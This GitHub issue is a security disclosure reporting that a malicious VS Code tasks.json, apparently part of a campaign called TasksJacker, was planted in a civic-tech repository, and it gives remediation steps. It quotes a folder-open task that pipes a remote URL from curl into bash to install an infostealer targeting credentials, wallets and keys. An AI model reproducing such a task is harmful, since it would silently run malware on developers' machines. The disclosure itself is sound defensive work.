hackforla / hackforla/knowledgebase-content

Security: Repository contains malicious .vscode/tasks.json (TasksJacker campaign)

Open
#161 0 comments 0 reactions 0 assignees View on GitHub
Dominant language
No language data
Stars
2
Forks
1
PR merge metrics
No merged PRs in 30d

Description

## Security Disclosure: This repository has been compromised

The repository **hackforla/knowledgebase-content** was compromised on **February 9, 2026** by the **TasksJacker** campaign — a DPRK-linked supply chain attack. A malicious `.vscode/tasks.json` file was injected that automatically executes malware when anyone opens this repository in VS Code.

**This is not spam.** This disclosure is from the [OpenSourceMalware.com](https://opensourcemalware.com) research team, which first identified and published research on this campaign.

### Compromised file

- **`.vscode/tasks.json`** — contains a task with `"runOn": "folderOpen"` trigger

### What the malicious file does

The `tasks.json` silently executes `curl https://260120.vercel.app/... | bash` when the folder is opened in VS Code. The payload is a multi-stage infostealer and backdoor targeting:

- Browser credentials and cookies
- Cryptocurrency wallet data
- SSH keys and Git credentials
- AWS/cloud credentials and API tokens

### Why this matters for hackforla

As a civic tech organization with community volunteers, any contributor who has cloned and opened this repo in VS Code may have been compromised. We recommend notifying your contributors.

### Immediate remediation steps

1. **Delete `.vscode/tasks.json`** from this repository
2. **Force-push** to remove it from git history
3. **Rotate credentials**: The GitHub account credentials used to push to this repo were compromised — rotate PATs, SSH keys, and passwords
4. **Enable 2FA** on all accounts with push access
5. **Notify contributors** who may have cloned this repo between Feb 9 and now
6. **Scan machines** of anyone with push access:
```bash
ps aux | grep "\.vscode.*node"
ls -la ~/.vscode/node-v*-*/
```

### More information

- Full technical analysis: https://opensourcemalware.com/blog/tasksjacker
- Campaign scope: 354+ repositories across 229+ accounts compromised
- Attribution: DPRK-affiliated threat actors (medium-high confidence)

---
*Disclosed by the [OpenSourceMalware.com](https://opensourcemalware.com) research team.*

Contributor guide

Open the contributing guide

Assessment

This issue has not been assessed yet.

Get new issues in your inbox

A short digest of beginner-friendly GitHub issues.